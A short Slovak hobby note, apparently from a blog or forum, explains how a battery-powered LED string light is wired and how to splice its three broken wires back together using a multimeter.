schéma zapojenia LED

Reťaz je napájaná 3ks AA batériami, teda zapojenie LED je tu paralelné (3 - 4,5V). Keďže ide o dlhú reťaz, ťahali jeden vodič až na opačný koniec pre rovnomerné rozloženie úbytkov napätia. LED sú v oboch smeroch, teda žltá a červená svieti vždy spolu, tak ako modrá a zelená. A možno ich prepínať medzi sebou, či rýchlym striedaním polarity zapnúť naraz.

Máme pretrhnuté 3 vodiče, najskôr spojím priechodzí vodič (nepripojený na LED), potom premeriam v mieste spojenia dvoch zvyšných, ktorý je z nich spojený priamo na priechodzí, ten zapojím ako posledný aby som nevytvoril skrat. Ten, čo mi ostal pokusne prepojím, ak svieti polovičným svitom celá reťaz, prepojil som nesprávne a pripojím druhý. Zostáva posledný a je to.

Pri pretrhaní na viacerých miestach overím otočenie pre rovnaké farby multimetrom v diódovom režime.